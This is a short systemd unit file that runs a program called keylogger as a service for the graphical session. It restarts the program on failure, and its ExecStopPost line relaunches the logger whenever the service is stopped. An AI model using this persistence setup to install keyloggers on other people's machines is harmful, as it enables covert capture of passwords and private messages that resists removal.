[Unit]
Description=keylogger

[Service]
Type=simple
ExecStart=/usr/bin/keylogger
ExecStop=/bin/bash -c 'kill $1; tail --pid=$1 -f /dev/null' sh $MAINPID
ExecStopPost=/usr/bin/launch keylogger
Restart=on-failure
RestartSec=5s

[Install]
WantedBy=graphical.target
